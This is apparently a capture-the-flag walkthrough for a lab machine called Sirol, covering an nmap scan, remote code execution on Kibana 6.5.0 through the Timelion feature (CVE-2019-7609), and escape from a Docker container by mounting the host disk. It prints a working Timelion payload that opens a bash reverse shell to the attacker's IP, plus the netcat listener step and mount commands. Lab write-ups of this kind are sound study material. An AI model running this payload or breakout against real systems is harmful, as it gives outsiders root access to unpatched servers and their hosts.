🐧Sirol

Nmap

sudo nmap 192.168.64.54 -p- -sS -sV

PORT      STATE  SERVICE   VERSION
22/tcp    open   ssh       OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
53/tcp    closed domain
80/tcp    open   http      Apache httpd 2.4.25 ((Debian))
3306/tcp  open   mysql     MariaDB (unauthorized)
5601/tcp  open   esmagent?
24007/tcp open   rpcbind

Port 5601 is hosting Kibana. Looking through the management option on the left shows we are running version 6.5.0.

Researching vulnerabilities on Google regarding this version takes us to an RCE exploit abusing the Timelion feature.

GitHub - mpgn/CVE-2019-7609: RCE on Kibana versions before 5.6.15 and 6.6.0 in the Timelion visualizerGitHub

From here I used the second payload shown on the GitHub and pasted this into Timelion to point back to my IP and port 5601.

.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -c \'bash -i>& /dev/tcp/<IP>/5601 0>&1\'");//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')

If you are unable to get code execution reset the machine and try again in an incognito browser window.

From here and as per the GitHub instructions hit the run button and then set up a netcat listener to the specified port.

After then browsing the 'Canvas' page we should receive a root shell back on our listener.

Listing everything inside the '/' directory shows a .dockerenv file. This combined with the hostname of 0873e8062560 means we are likely running inside a docker container.

Using the command fdisk -l we can list the hosts disks.

We can then create a directory and attempt to mount /dev/sda1 to it so we can see if we can browse the hosts file system.

mkdir /mnt/own
mount /dev/sda1 /mnt/own
cd /mnt/own

References:

• https://book.hacktricks.xyz/linux-unix/privilege-escalation/docker-breakout
• https://github.com/mpgn/CVE-2019-7609